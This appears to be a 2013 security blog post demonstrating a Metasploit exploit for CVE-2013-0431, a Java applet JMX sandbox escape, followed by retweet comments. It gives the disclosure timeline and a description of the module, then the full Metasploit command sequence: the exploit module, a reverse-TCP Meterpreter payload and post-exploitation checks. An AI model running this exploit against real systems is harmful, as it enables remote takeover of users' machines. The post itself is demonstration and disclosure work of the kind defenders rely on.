CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo

25/02/2013Exploits, MetasploitCVE-2013-0431, Java, Java SE 7, Oraclewow

Timeline :

Vulnerability discovered and reported to the vendor by Security Explorations the 2013-01-18
Vulnerability patched by the vendor the 2013-02-01
Vulnerability discovered exploited in the wild by kafeine and EKwatcher the 2013-02-18
Metasploit PoC provided the 2013-02-25

PoC provided by :

Unknown
Adam Gowdiak
SecurityObscurity
juan vazquez

Reference(s) :

CVE-2013-0431
OSVDB-89613
BID-57726
Malware don’t need Coffee
Security Explorations
Security Obscurity

Affected version(s) :

Java SE 7U11 and previous

Tested on Windows 7 Integral SP1 with :

Java SE 7U11

Description :

This module abuses the JMX classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February of 2013. Additionally, this module bypasses default security settings introduced in Java 7 Update 10 to run unsigned applet without displaying any warning to the user.

Commands :

use exploit/multi/browser/java_jre17_jmxbean_2
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

14 thoughts on “CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo”

mike_yottabyte says:

27/02/2013 at 05:58

http://t.co/HlIrgiyJHj
BackTrackAcadem says:

27/02/2013 at 00:58

Applet Java JMX Ejecución remota de código Metasploit demo

BackTrack Academy http://t.co/gHmjUUE82L
Hfuhs says:

26/02/2013 at 20:56

CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo – http://t.co/1ygVkw08Q6
usscastro says:

26/02/2013 at 13:35

RT @eromang: CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/IT9hpNJCsJ #infosec
unixfreaxjp says:

26/02/2013 at 11:37

#Exploit Demo Video #CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo – http://t.co/yYNw9VSIqy https://t.co/HmbI4XqwkC
espreto says:

26/02/2013 at 05:18

“@eromang: CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/iW7csS4V6Z #infosec”
_BirSingh says:

26/02/2013 at 03:31

CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/65lD86QepP #infosec
teravice says:

25/02/2013 at 23:48

RT @eromang: CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/IT9hpNJCsJ #infosec
HackeaMesta says:

25/02/2013 at 23:41

RT @TheHackersNews: CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/RDejdK2xNz via @eromang
TheHackersNews says:

25/02/2013 at 23:40

CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/71uMOlmgiO #infosec via @eromang
twihateb says:

25/02/2013 at 23:40

CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo
B! http://t.co/iL7TorXIES
#twihateb
bluejay00 says:

25/02/2013 at 22:53

RT @eromang: CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/IT9hpNJCsJ #infosec
yvan133 says:

25/02/2013 at 22:53

@eromang moi, j’ai autant confiance en Java qu’en windows 95 … 😉
whereits says:

25/02/2013 at 22:52

RT @eromang: CVE-2013-0431 #Oracle #Java Applet JMX Remote Code Execution #Metasploit Demo http://t.co/IT9hpNJCsJ #infosec

Comments are closed.